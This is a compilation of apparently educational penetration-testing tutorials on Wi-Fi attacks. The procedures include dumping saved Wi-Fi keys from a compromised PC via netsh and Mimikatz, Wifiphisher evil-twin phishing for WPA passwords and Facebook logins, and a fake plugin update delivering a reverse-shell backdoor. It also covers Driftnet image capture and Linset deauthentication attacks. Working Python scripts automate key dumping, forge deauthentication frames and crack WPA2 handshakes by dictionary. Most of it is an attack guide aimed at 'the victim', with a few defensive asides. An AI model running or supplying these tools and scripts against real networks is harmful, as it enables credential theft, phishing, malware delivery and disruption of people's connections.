Wifi Post Exploitation on Remote PC

Wi-Fi security is only as strong as the protocol and passphrase in use: WEP is broken outright, and a WPA/WPA2 pre-shared key is exposed the moment a saved profile or a weak passphrase is. This article covers several ways to enumerate the basic service sets (BSS) visible to a compromised remote user's machine, read its current connection details, extract its saved wireless LAN profiles (including the key material), and finally disconnect the target from its Wi-Fi. All of the following are post-exploitation attacks: they assume you already have a session on the victim's PC.

Table of Content

  • Introduction
  • Working of Wi-Fi
  • Types of Wi-Fi security
  • WLAN BSS List
  • WLAN Current Connection
  • WLAN Profile
  • WLAN Disconnect
  • Mimikatz
  • Netsh

Introduction

Wi-Fi is the Wi-Fi Alliance's trademark for wireless local area networking (WLAN) built on the IEEE 802.11 standards, and the name is commonly used for any 802.11 network. It carries IP traffic over radio rather than cable and is supported by phones, laptops, tablets, game consoles and practically every modern operating system, which is what lets those devices talk to each other and reach the internet without a physical link.

Working of Wi-Fi

As the name suggests, a Wi-Fi network needs no physical connection between sender and receiver: it uses radio frequencies in the electromagnetic spectrum, and modern 802.11 revisions reach speeds comparable to wired links. Every Wi-Fi connection goes through an Access Point (AP). The AP's main job is to broadcast its signal (beacon frames carrying the network name, the SSID) so that nearby devices can detect the network; once a device sees the signal it associates with the AP and, if the network is protected, authenticates with the configured security protocol before it can use the connection.

Types of Wi-Fi security

  • Wired Equivalent Privacy (WEP), based on RC4; cryptographically broken and recoverable in minutes
  • Wi-Fi Protected Access (WPA), the interim replacement based on TKIP
  • Wi-Fi Protected Access 2 (WPA2), based on AES-CCMP; in the personal (PSK) variant its security rests entirely on the pre-shared passphrase

Netsh

Now that you have a session on the victim's PC, drop to a shell and use netsh to list the wireless profiles the PC has saved over time (the command and its output were captured in the original screenshot):

As the screenshot shows, to date the PC has been connected to Pentest Lab, Sinos, POCO PHONE and ignit. Next, query one profile by name to get its connectivity and security settings (authentication type and cipher):

Finally, ask netsh to show the same profile with the key in clear text to reveal that network's Wi-Fi password. On recent Windows builds this needs administrator rights; without them the Key Content line is simply omitted.
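As an added example (not code from the original article), the following Python script automates the netsh steps above: it runs "netsh wlan show profiles", then "netsh wlan show profile name=<name> key=clear" for each saved profile, and parses the output into structured records. The sample output embedded in the script is constructed to mirror the real netsh format (the profile names follow the article; the key "Summer2019!" is made up) so the parser can be exercised on a non-Windows host; the helper names are my own.

```python
import platform
import re
import subprocess

# Constructed sample of "netsh wlan show profiles" output (not captured from a
# real host); the profile names follow the article.
SAMPLE_PROFILE_LIST = """
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Pentest Lab
    All User Profile     : Sinos
    All User Profile     : POCO PHONE
    All User Profile     : ignit
"""

# Constructed sample of 'netsh wlan show profile name="Pentest Lab" key=clear';
# the key is made up.
SAMPLE_PROFILE_DETAIL = """
Profile Pentest Lab on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : Pentest Lab

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "Pentest Lab"
    Network type           : Infrastructure

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Summer2019!
"""

FIELDS = ("Name", "SSID name", "Authentication", "Cipher", "Security key", "Key Content")


def parse_profile_names(text):
    """Names of the saved profiles listed by 'netsh wlan show profiles'."""
    return re.findall(r"^[ \t]*(?:All|Current) User Profile[ \t]*:[ \t]*(.+?)[ \t]*$", text, re.M)


def parse_profile_detail(text):
    """Pick the interesting fields out of a 'netsh wlan show profile ... key=clear' dump.
    'Key Content' is absent when the shell lacks the rights to read the key."""
    fields = {}
    for key in FIELDS:
        m = re.search(r"^[ \t]*%s[ \t]*:[ \t]*(.+?)[ \t]*$" % re.escape(key), text, re.M)
        if m:
            fields[key] = m.group(1).strip('"')
    return fields


def run_netsh(cmd):
    """Run a netsh command line and return its output (Windows only)."""
    return subprocess.run(cmd, capture_output=True, text=True).stdout


def dump_saved_profiles(run=run_netsh):
    """Enumerate every saved profile and read its key in the clear.
    `run` takes a command string and returns its output, so it can be swapped
    for a fake on non-Windows hosts."""
    profiles = []
    for name in parse_profile_names(run("netsh wlan show profiles")):
        detail = parse_profile_detail(run('netsh wlan show profile name="%s" key=clear' % name))
        profiles.append(detail)
    return profiles


def fake_netsh(cmd):
    """Stand-in for run_netsh that replays the constructed samples."""
    return SAMPLE_PROFILE_LIST if cmd.endswith("profiles") else SAMPLE_PROFILE_DETAIL


if __name__ == "__main__":
    live = platform.system() == "Windows"
    for p in dump_saved_profiles(run_netsh if live else fake_netsh):
        print("%-20s %-15s %-6s key=%s" % (p.get("Name"), p.get("Authentication"),
                                           p.get("Cipher"), p.get("Key Content", "<not readable>")))
```

Run it from a shell on the victim and it prints one line per saved network; on any other host it replays the constructed samples. Because the parser tolerates a missing Key Content line, an unprivileged shell still yields the SSID list and security settings, which tells you which profiles are worth a second pass once you have elevated.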

WLAN BSS List

This module gathers information about the wireless Basic Service Sets available to the victim machine.

For example, this gives you the SSID and other important details of each wireless network in range of the victim.

From the image below you can see that it found "5 networks", such as Pen Lab, Sinos and Ignite, each with its basic details (BSSID, network type and signal strength).

WLAN Current Connection

This module gathers information about the current connection on each wireless LAN interface on the target machine.

The image below shows that "Pen Lab" is the network the victim is currently connected to, together with basic details such as the MAC address (BSSID) of the access point, the security status, the authentication type and the cipher.

WLAN Profile

This module extracts saved Wireless LAN profiles and tries to decrypt the network key material. Behaviour differs between OS versions for WPA: on Windows Vista/7 the profile yields the passphrase itself, while on Windows XP it yields only the PBKDF2-derived 256-bit key (the PMK), which is enough to join the network but cannot be turned back into the passphrase.

From the image below you can see that it extracted the profile of the network the victim is connected to and decrypted its shared key (the password). Hence the password for "Pen Lab" is confirmed as "[email protected]".
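The raw material behind this module is the profile XML that Windows stores for each network (WlanGetProfile returns it, and "netsh wlan export profile key=clear" writes the same format to disk). As an added example, not the module's own code, the Python below parses that XML and classifies what the keyMaterial element actually gives you: a passphrase; an XP-style PBKDF2-derived PMK (64 hex digits, keyType networkKey) that can be checked against candidate passphrases but not reversed; or a DPAPI blob (protected=true) that still needs CryptUnprotectData on the host. Both profile documents are constructed: the first uses a made-up passphrase, the second carries the IEEE 802.11i test vector (passphrase "password", SSID "IEEE") so the PMK check can be verified.

```python
import hashlib
import xml.etree.ElementTree as ET

NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Constructed Vista/7-style profile: the key is stored as the passphrase itself.
SAMPLE_PROFILE_XML = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Pen Lab</name>
  <SSIDConfig><SSID><hex>50656E204C6162</hex><name>Pen Lab</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>Summer2019!</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>"""

# Constructed XP-style profile: keyMaterial is the 256-bit PMK, here the
# IEEE 802.11i test vector PBKDF2("password", "IEEE").
SAMPLE_XP_PROFILE_XML = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>IEEE</name>
  <SSIDConfig><SSID><hex>49454545</hex><name>IEEE</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM><security>
    <authEncryption><authentication>WPAPSK</authentication><encryption>TKIP</encryption><useOneX>false</useOneX></authEncryption>
    <sharedKey><keyType>networkKey</keyType><protected>false</protected>
      <keyMaterial>f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>"""


def parse_wlan_profile(xml_text):
    """Extract SSID, security settings and stored key material from a WLAN profile document."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    ssid_hex = text("w:SSIDConfig/w:SSID/w:hex")
    sec = "w:MSM/w:security/"
    return {
        "name": text("w:name"),
        # the <hex> form is authoritative: an SSID may contain bytes that are not printable
        "ssid": bytes.fromhex(ssid_hex).decode("utf-8", "replace") if ssid_hex
                else text("w:SSIDConfig/w:SSID/w:name"),
        "authentication": text(sec + "w:authEncryption/w:authentication"),
        "encryption": text(sec + "w:authEncryption/w:encryption"),
        "key_type": text(sec + "w:sharedKey/w:keyType"),
        "protected": text(sec + "w:sharedKey/w:protected") == "true",
        "key_material": text(sec + "w:sharedKey/w:keyMaterial"),
    }


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def recoverable_secret(profile):
    """Classify the stored key: ('passphrase', str), ('pmk', hex), ('dpapi', blob) or ('none', None)."""
    if not profile["key_material"]:
        return ("none", None)
    if profile["protected"]:
        # hex-encoded DPAPI blob; decrypting it needs CryptUnprotectData in the
        # owning user's (or SYSTEM's) context on the victim host
        return ("dpapi", profile["key_material"])
    if profile["key_type"] == "passPhrase":
        return ("passphrase", profile["key_material"])
    if profile["key_type"] == "networkKey":
        return ("pmk", profile["key_material"].lower())
    return ("none", None)


def passphrase_matches(profile, candidate):
    """True if `candidate` is the network's passphrase, whether the profile stores
    the passphrase directly or only the PMK derived from it."""
    kind, secret = recoverable_secret(profile)
    if kind == "passphrase":
        return candidate == secret
    if kind == "pmk":
        return pmk_from_passphrase(candidate, profile["ssid"]).hex() == secret
    return False


if __name__ == "__main__":
    for doc in (SAMPLE_PROFILE_XML, SAMPLE_XP_PROFILE_XML):
        p = parse_wlan_profile(doc)
        print(p["ssid"], p["authentication"], p["encryption"], recoverable_secret(p))
    print(passphrase_matches(parse_wlan_profile(SAMPLE_XP_PROFILE_XML), "password"))
```

The point of the PMK branch is the one the module's description hints at: an XP profile does not leak the passphrase, but PBKDF2 with 4096 iterations over a short SSID is cheap enough that a dictionary can be run against the stored key offline, exactly as it would be against a captured handshake.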

WLAN Disconnect

This module disconnects the current wireless network connection on the specified interface, cutting the victim off the network (and, if your own session is tunnelled over that link, cutting you off too).

From the image below you can confirm that it disconnects the victim from the current wireless network.

Mimikatz

Mimikatz is best described as a post-exploitation toolkit: it has many features far beyond dumping plain-text passwords, including a module (misc::wifi) that reads the saved wireless profiles and their keys.

Running it gives you the entire list of saved wireless networks together with their passwords. VOILA! You got it right.

Great!! From the image below you can confirm that it dumped the shared key (password) and authentication type of each saved SSID.

About the Author

Nisha Yadav is trained in Certified Ethical Hacking and Bug Bounty Hunting. She is currently working at Hiddenramp as a Security Analyst.

WiFi Exploitation with WifiPhisher

Hello friends! Today we are going to demonstrate a Wi-Fi phishing attack using the excellent tool Wifiphisher; its description follows.

Wifiphisher is a security tool that mounts automated, victim-customised phishing attacks against Wi-Fi clients in order to obtain credentials or infect the victims with malware. It is primarily a social-engineering attack: unlike other methods it involves no brute forcing. It is an easy way to obtain credentials from captive portals and third-party login pages (e.g. social networks) or WPA/WPA2 pre-shared keys.

Requirement

  • Kali Linux.
  • Two Wi-Fi adapters: one that supports AP mode and another that supports monitor mode (the second is used for the deauthentication/jamming phase).

Wifiphisher Working

After gaining a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack consists of three phases:

  1. The victim is deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's Wi-Fi clients within range by forging "Deauthenticate" and "Disassociate" frames to disrupt existing associations.
  2. The victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings, then creates a rogue wireless access point modelled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Because of the jamming, clients will eventually start connecting to the rogue access point; after this phase the victim is in a MiTM position. Wifiphisher also listens for probe-request frames and spoofs "known" open networks to cause automatic association (the KARMA technique).
  3. The victim is served a realistic, specially customised phishing page. Wifiphisher runs a minimal web server that responds to HTTP and HTTPS requests. As soon as the victim requests any page from the Internet, Wifiphisher responds with a realistic fake page that asks for credentials or serves malware. The page is crafted for the victim; for example, a router-configuration-style page will carry the logos of the victim's router vendor. The tool supports community-built templates for different phishing scenarios.
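Phase 1 above (and the deauthentication step that Linset and aireplay-ng also rely on) works because, without 802.11w Protected Management Frames, any station can forge a deauthentication or disassociation frame on behalf of the access point. As an added example, not Wifiphisher's own code, the Python below builds such a frame from its 802.11 header fields, parses it back, and then runs a simple detector over a constructed capture (timestamps, MACs and frames are made up) that flags a BSSID emitting a burst of deauth/disassoc frames, which is the signature a wireless IDS looks for. Frame injection itself needs a monitor-mode interface and a radiotap header, which this example deliberately leaves out.

```python
import struct

DEAUTH, DISASSOC = 12, 10          # 802.11 management-frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_NONASSOC = 7         # "class 3 frame received from nonassociated STA", a common choice for jamming


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3_NONASSOC, seq=0, subtype=DEAUTH):
    """Raw 802.11 deauth/disassoc frame (no radiotap header, no FCS).
    Header: frame control (2) | duration (2) | addr1 | addr2 | addr3 | seq control (2); body: reason code."""
    fc0 = (subtype << 4) | (0 << 2) | 0        # subtype, type 0 = management, protocol version 0
    header = struct.pack("<BBH6s6s6sH", fc0, 0, 0,
                         mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), (seq & 0xfff) << 4)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame):
    """Decode the header fields of a management frame; adds the reason code for deauth/disassoc."""
    fc0, _fc1, _dur, a1, a2, a3, seqctl = struct.unpack("<BBH6s6s6sH", frame[:24])
    info = {"type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4,
            "dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3), "seq": seqctl >> 4}
    if info["type"] == 0 and info["subtype"] in (DEAUTH, DISASSOC):
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


def detect_deauth_flood(capture, window=10.0, threshold=20):
    """Return {bssid: peak count} for BSSIDs that send >= `threshold` deauth/disassoc
    frames inside any `window`-second interval. `capture` is a list of (timestamp, frame)."""
    recent, hits = {}, {}
    for t, frame in sorted(capture, key=lambda item: item[0]):
        info = parse_mgmt(frame)
        if info["type"] != 0 or info["subtype"] not in (DEAUTH, DISASSOC):
            continue
        times = recent.setdefault(info["bssid"], [])
        times.append(t)
        while times and times[0] < t - window:
            times.pop(0)
        if len(times) >= threshold:
            hits[info["bssid"]] = max(hits.get(info["bssid"], 0), len(times))
    return hits


def sample_capture():
    """Constructed capture: a jammer spoofing AP 00:11:22:33:44:55 with 30 broadcast
    deauths in 3 s, plus one ordinary disassoc from an unrelated AP."""
    ap, other = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
    frames = [(1000.0 + i * 0.1, build_deauth(BROADCAST, ap, ap, seq=i)) for i in range(30)]
    frames.append((1001.0, build_deauth("66:77:88:99:aa:cc", other, other,
                                        reason=8, subtype=DISASSOC)))   # reason 8: station leaving the BSS
    return frames


if __name__ == "__main__":
    frame = build_deauth(BROADCAST, "00:11:22:33:44:55", "00:11:22:33:44:55", seq=1)
    print(frame.hex())
    print(parse_mgmt(frame))
    print(detect_deauth_flood(sample_capture()))
```

Note that the spoofed frames carry the AP's address in both addr2 and addr3 and the broadcast address as addr1, so every client drops its association at once; that burst of unauthenticated management frames from one BSSID is what the detector keys on. Networks with 802.11w enabled (mandatory in WPA3) ignore forged frames of this kind, which is why the evil-twin tools on this page do nothing useful against them.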

Let’s start!!!

Open a terminal in Kali Linux and clone Wifiphisher from its GitHub repository.

Once the download completes, run the repository's setup script (setup.py) to install the tool and its dependencies, as shown below:

Now launch it by typing wifiphisher in the terminal; what follows is essentially a social-engineering attack delivered over Wi-Fi.

It first lists the wireless networks it can see, as in the image, and lets the attacker pick the ESSID/BSSID of the target network whose clients will be trapped with a phishing page. It performs both the Evil Twin and KARMA attacks.

From the list of networks I targeted "iball-baton" to trap the clients connected to it.

After that you are offered 4 phishing scenarios to trap your target, as given below:

  1. Firmware Upgrade page
  2. Network Manager Connect
  3. Browser plugin update
  4. OAuth Login Page

Now let's go through each phishing scenario one by one, starting with the 1st option.

Firmware Upgrade page: a router configuration page, without logos or branding, that asks for the WPA/WPA2 password on the pretext of a firmware upgrade.

When the victim opens Firefox he sees a phishing page telling him a firmware upgrade is available and that the WPA/WPA2 password is required to install the new version.

The victim may take it for an official notification and proceed by submitting his Wi-Fi password. As soon as he enters the WPA/WPA2 password and clicks "start upgrade", he is shown a fake upgrade progress page.

The following image shows the page pretending to the victim that the firmware is being upgraded and asking him not to close it until it completes, while in the background the attacker has already captured the WPA/WPA2 password.

Great!! You can confirm the WPA/WPA2 password in the image below; it shows WPA-password: ram123456ram

Repeat the same steps to select the ESSID again.

Now let us go through another phishing scenario, the 2nd option.

Network Manager Connect: imitates the behaviour of the operating system's network manager. This template shows a Chrome "connection failed" page and displays a network-manager window inside the page asking for the pre-shared key. Currently the network managers of Windows and macOS are supported.

When the victim opens a browser he gets a fake "connection failed" page together with a fake network-manager window.

Here the target clicks "Connect" to reconnect to the network.

It asks for the password of the selected network, while in the background the attacker captures the WPA/WPA2 password.

Great!! Again you can confirm the WPA/WPA2 password in the image below; it captured WPA-password: ram123456ram

Repeat the same steps to choose the ESSID for the attack.

Browser plugin update: a generic browser plugin-update page that can be used to serve payloads to the victims.

It creates a .exe payload and runs a Metasploit multi/handler in the background to receive the reverse connection from the victim's system.

When the victim opens a browser he gets another fake page, this time an "update plugins" page as shown in the image, which recommends updating an outdated Flash Player.

When the victim clicks "Update Now", the browser starts downloading an update.exe file, which is nothing but the backdoor executable used to gain unauthorised access to his system.

Awesome!! The attacker receives the reverse connection from the target's system; in the image below you can see it opened meterpreter session 1.

Repeat the same steps to choose the ESSID for the attack.

Now move on to its last option, the 4th.

OAuth Login Page: a free Wi-Fi service asking for Facebook credentials to authenticate via OAuth.

This time, when the victim opens a browser, he lands on a phishing page offering "Get connected to the Internet for free", as shown in the image.

When the victim enters his Facebook credentials to get the free internet, he falls for the phishing attack.

Here you can see the victim enter a username and password and click on Login for the Facebook connection; he receives an error message, while the attacker has captured his Facebook credentials.

Wonderful!! The attacker has successfully trapped the victim and fetched his Facebook account credentials.

Author: Sanjeet Kumar is an Information Security Analyst, Pentester and Researcher.

Capture Images in Mobile using Driftnet through Wifi Pumpkin

WiFi-Pumpkin is an open-source security tool that provides a rogue access point for man-in-the-middle and network attacks. With WiFi-Pumpkin one can create a Wi-Fi network that captures all the requests made by any device that connects to it.

First of all, you need to download WiFi-Pumpkin and install it in Kali Linux. To download it, go to https://github.com/P0cL4bs/WiFi-Pumpkin and click on Clone or Download. Copy the URL to the clipboard, open a terminal and type:

 git clone “URL copied to clipboard”

Next, change into the WiFi-Pumpkin directory in the terminal. For example, if the repo was downloaded to the Desktop, type:

Then run wifi-pumpkin:

This opens the GUI version of WiFi-Pumpkin. Now select the network adapter and change the SSID from the default PumpAP to whatever name you want.

Then click the Start button. This creates a new Wi-Fi network with the name entered in the SSID field.

As soon as any device connects to this Wi-Fi network, its details appear in the table on the right. Select any target device from the list of connected devices and choose Active Driftnet from the Tools menu.

Once Driftnet starts, it displays the images it carves out of the victim's traffic as the desktop or mobile device browses. Note that Driftnet only sees images carried in cleartext HTTP; traffic to TLS-protected sites (which today includes Facebook and most large web applications) passes through the rogue AP encrypted and yields nothing unless the victim can also be tricked into accepting a forged certificate or a protocol downgrade.

Author: Shivam Gupta is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India.
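Driftnet works by reassembling TCP streams and carving anything that looks like an image file out of them. As an added example, not Driftnet's own code, the Python below does the same on a constructed byte stream that mimics two cleartext HTTP responses: a real 1x1 PNG built in the script, and a JPEG stand-in that carries only the start, APP0 and end markers. Everything it finds is by construction cleartext; the same traffic over TLS would be opaque to it.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8\xff"      # start of image followed by the first marker byte
JPEG_EOI = b"\xff\xd9"


def make_png_1x1():
    """A valid 1x1 red PNG, built from scratch so the sample stream contains a real image."""
    def chunk(ctype, data):
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data) & 0xffffffff)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)    # 1x1, 8-bit depth, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")               # filter byte + one RGB pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


# Constructed stand-in for a JPEG: correct SOI/APP0/EOI framing, no decodable picture data.
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"


def http_response(ctype, body):
    return b"HTTP/1.1 200 OK\r\nContent-Type: %s\r\nContent-Length: %d\r\n\r\n" % (ctype, len(body)) + body


# Constructed reassembled TCP stream: two cleartext HTTP responses from the same server.
SAMPLE_STREAM = http_response(b"image/png", make_png_1x1()) + http_response(b"image/jpeg", FAKE_JPEG)


def carve_images(stream):
    """Return [(kind, offset, data)] for each PNG or JPEG found in a raw byte stream, in stream
    order. Naive by design: a JPEG with an embedded thumbnail is cut at the thumbnail's EOI,
    which is exactly the kind of edge case a real carving tool has to special-case."""
    found = []
    pos = 0
    while True:
        start = stream.find(PNG_SIG, pos)
        if start == -1:
            break
        iend = stream.find(b"IEND", start + len(PNG_SIG))
        if iend == -1:
            break
        end = iend + 8                                       # IEND type (4) + CRC (4)
        found.append(("png", start, stream[start:end]))
        pos = end
    claimed = [(s, s + len(d)) for _, s, d in found]
    pos = 0
    while True:
        start = stream.find(JPEG_SOI, pos)
        if start == -1:
            break
        if any(s <= start < e for s, e in claimed):         # SOI bytes occurring inside a PNG body
            pos = start + 1
            continue
        end = stream.find(JPEG_EOI, start + 2)
        if end == -1:
            break
        found.append(("jpeg", start, stream[start:end + 2]))
        pos = end + 2
    return sorted(found, key=lambda item: item[1])


if __name__ == "__main__":
    for kind, off, data in carve_images(SAMPLE_STREAM):
        print(kind, "at offset", off, len(data), "bytes")
```

Because the carver ignores the HTTP framing entirely, it also picks up images inside multipart bodies or unexpected content types; what it cannot do is see through gzip or chunked transfer encoding, which a real tool has to undo first.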

Hack Wifi using Evil Twin Method with Linset in kali Linux

Linset is a tool for the Evil Twin attack.

How it works

  • Scans the networks.
  • Select a network.
  • Captures the handshake (it can also be used without a handshake).
  • Choose one of several web interfaces (contributed by users) to present to the victim.
  • Mounts a FakeAP imitating the original.
  • A DHCP server is created on the FakeAP.
  • A DNS server is created to redirect all requests to the host.
  • The web server with the selected interface is launched.
  • The mechanism is launched to check the validity of the passwords that will be entered (against the captured handshake).
  • It deauthenticates all users of the network, hoping they connect to the FakeAP and enter the password.
  • The attack stops once a password passes the check.
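Linset's "check the validity of the passwords" step is the same computation aircrack-ng performs: derive the PMK from the candidate passphrase and SSID, expand it into the PTK using the two MAC addresses and nonces from the captured 4-way handshake, and recompute the MIC of the client's EAPOL message 2 with the KCK. As an added example, not Linset's or aircrack-ng's code, the Python below implements that check for WPA2 (key descriptor version 2, HMAC-SHA1-128). Since no real capture is on the page, it also simulates the supplicant side to build a handshake for a constructed network (MACs and nonces are made up; the SSID and key are the article's rajlab / raj123987), so the checker is validated against the same algorithm a real client uses.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
                  # + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8)


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32): the expensive step repeated per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: four HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return out[:64]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from the PMK, authenticator/supplicant MACs and nonces; the KCK is its first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic_wpa2(kck, eapol):
    """Key MIC for descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed,
    truncated to 128 bits. (WPA/TKIP, version 1, uses HMAC-MD5 instead.)"""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(candidate, hs):
    """True if `candidate` reproduces the MIC on message 2 of the captured handshake `hs`."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    expected = hs["eapol2"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic_wpa2(kck, hs["eapol2"]), expected)


def crack(hs, candidates):
    """Dictionary attack: return the first candidate whose MIC matches, or None."""
    for word in candidates:
        if check_passphrase(word, hs):
            return word
    return None


def make_sample_handshake(passphrase, ssid):
    """Simulate the supplicant building message 2 for a constructed network (not a real capture)."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # made-up MACs
    anonce, snonce = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()
    body = (b"\x02"                               # descriptor type: RSN
            + struct.pack(">HH", 0x010a, 16)      # key info: pairwise | MIC | version 2; key length 16
            + struct.pack(">Q", 1)                # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key ID
            + b"\x00" * 16 + struct.pack(">H", 0))                 # MIC placeholder, key data length
    eapol = b"\x02\x03" + struct.pack(">H", len(body)) + body      # EAPOL v2, type 3 = EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic_wpa2(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol2": eapol}


if __name__ == "__main__":
    hs = make_sample_handshake("raj123987", "rajlab")
    print(crack(hs, ["password", "12345678", "raj123987"]))
```

Every submission on the captive portal goes through check_passphrase against the handshake captured earlier, which is why Linset can tell a wrong password from the right one and keep the portal up until it gets a match. The same function, fed a wordlist instead of the victim's input, is the offline attack; the evil twin exists because that offline attack is hopeless against a passphrase that is not in any wordlist.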

First of all, download Linset from GitHub with the command:

git clone https://github.com/vk496/linset.git

then make the linset script executable:

chmod +x linset

and execute it:

./linset

After execution it asks you to choose the interface; select wlan0 (the wireless interface), which it puts into monitor mode.

Then it asks you to select the channel; enter 1 to scan all channels.

Monitor mode now listens for all the available Wi-Fi networks, so wait until your target appears and then press Ctrl+C.

It then lists all the APs with their SSID, id number and signal strength; enter the id of your target and hit Enter. In my case I selected rajlab by entering 1.

Now select hostapd by entering 1; it is used to create the fake AP.

Hit Enter to use the default path for the capture file, or give a custom path. It then asks which method to use to check the handshake; select 1 for aircrack-ng.

Now select 1 to deauthenticate all the clients connected to the target AP, so that a handshake is captured when they reconnect.

When the handshake has been captured you will see it in the top right corner of the new window; then enter 1 in the menu window to confirm that the handshake was captured.

Now select 1 for the web interface that will be presented to the victim when he connects to our fake AP.

It then asks for the language of the web interface; enter 1 for English.

Now 4 terminal windows open: one creates the fake AP, one keeps deauthenticating all the clients, and another shows the details of the AP and the attempts made against it.

As you can see, two rajlab APs are now present: one is fake and open, the other is the original. Clients cannot stay connected to the original because of our deauth attack, so they are pushed towards our fake AP.

After connecting to the fake AP, the victim's browser is redirected to the web page shown below, which asks for the original AP's password; the attack only stops when the victim enters the correct password, because every submission is checked against the captured handshake.

After the correct password is submitted, the attack stops and the victim is shown a message saying that the connection will be restored.

As you can see, in my case the victim entered the correct password and we recovered the key:

KEY FOUND! [ raj123987 ]

Author: Himanshu Gupta is an InfoSec Researcher and Technical Writer. You can follow him on LinkedIn.